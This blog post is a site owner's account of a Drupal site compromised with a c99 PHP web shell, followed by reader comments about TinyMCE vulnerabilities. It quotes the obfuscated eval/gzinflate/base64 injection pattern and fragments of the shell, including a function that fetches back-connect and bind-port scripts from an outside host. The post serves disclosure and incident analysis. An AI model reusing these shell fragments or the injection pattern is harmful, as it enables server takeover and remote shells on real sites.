My site was attacked…here are the details

What you are about to read is arguably the number one problem with PHP and script based sites. I can’t communicate enough the importance of site security both at the HTTP and FTP site protocols. Unlike other technologies, like Domino NSF, script based web sites can easily be hacked by script monkeys. If you don’t care about PHP sites and the different ways it can be hacked then please don’t read this.

One day last week, I noticed the performance on my sites had severely degraded. I got several reports from people who frequent the sites saying it was down. I checked several different browsers and sure enough, there was something wrong with the site. I logged into the system to see if there were database problems, index problems or missing files and everything looked fine. I have three main sites that I use PHP on, two Drupal based sites and one WordPress based site. It looks like only one of the Drupal sites were attacked.

The attacker got into my system and added a single line of script code to every index.php that looked similar to this (encrypted code was much larger):

eval(gzinflate(base64_decode('80jNyclXyFTPVUhJTc5PSU0BAA==')));

The PHP code is actually embedded as a Base64 encoded string, inflated using gzinflate and then evaluated using the eval method. So basically the attacker can pretty much do anything on the server at that point, but it gets better. I actually used an online utility to decipher the end encryption – check out this site.

The attacker put two php files(e2cd.php, f07.php) deep into my system directory structure. They just happen to pick the TinyMCE plugin (which could actually have been another avenue of attack, more on that later). So what did these files do? Well, they were system script files that gave a visitor to my site (when a specific URL was sent into the index.php) a UI of system tools into my server. The attack looked for the following files:

array("html","htm","shtml"), "txt"=>
array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), "exe"=>
array("sh","install","bat","cmd"), "ini"=>
array("ini","inf"), "code"=>
array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), "img"=>
array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb"=>
array("sdb"), "phpsess"=>
array("sess"), "download"=>
array("exe","com","pif","src","lnk","zip","rar","gz","tar") );
$exeftypes = array( getenv("PHPRC")." -q %f%" =>
array("php","php3","php4"), "perl %f%" =>
array("pl","cgi") );

The tools also allowed the viewer to iterate through databases and dump the contents of all tables it could find. This means it had to know where the DB was and the credentials to get in – I am still looking to figure out how/if they were able to actually do that.

The script references this site all over the place – http://ccteam.ru/files/c99sh_sources. It even attempts to pull scripts in from that site and execute them:

function c99getsource($fn)
 {
     global $c99sh_sourcesurl;
     $array = array( "c99sh_bindport.pl" =>
     "c99sh_bindport_pl.txt", "c99sh_bindport.c" =>
     "c99sh_bindport_c.txt", "c99sh_backconn.pl" =>
     "c99sh_backconn_pl.txt", "c99sh_backconn.c" =>
     "c99sh_backconn_c.txt", "c99sh_datapipe.pl" =>
     "c99sh_datapipe_pl.txt", "c99sh_datapipe.c" =>
     "c99sh_datapipe_c.txt", );
     $name = $array[$fn];
     if ($name)
      {
         return file_get_contents($c99sh_sourcesurl.$name);
      }
    else
     {
       return FALSE;
     }
 }

So how could this have happened?

I think there are three possibilities:

  1. My FTP password was compromised, which I doubted because its so crazy or an account with my domain provider was compromised.
  2. PHP security flaw – I checked all of my parameters and they all appear fine.
  3. TinyMCE security flaw – I am still checking into this, I don’t think it’s likely. I did verify the plugins I am using have no known vulnerabilities but that isn’t saying much.

Any and all comments or suggestions are welcome.

3 thoughts on “My site was attacked…here are the details

  1. Hey Bob,

    I spotted this in my news feed and have several sources to point you towards dealing with security flaws with TinyMCE. One of which was only released 19 hours ago.

    http://osvdb.org/show/osvdb/72116
    http://osvdb.org/show/osvdb/69990
    http://osvdb.org/show/osvdb/64215
    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1867

    In addition, there were patches to TinyMCE in WordPress 3.1.1

    http://blog.sucuri.net/2011/04/wordpress-3-1-1-is-available-security-fixes.html

    Like

  2. consider this my “subscribe” to this post… Any news on the attack vector? What version of Drupal are you running? Did you post/search the Drupal boards for assistance? Was it indeed TinyMCE? If so, I’d strongly recommend switching to the YUI editor.M (I’d recommend the YUI editor anyways…)

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s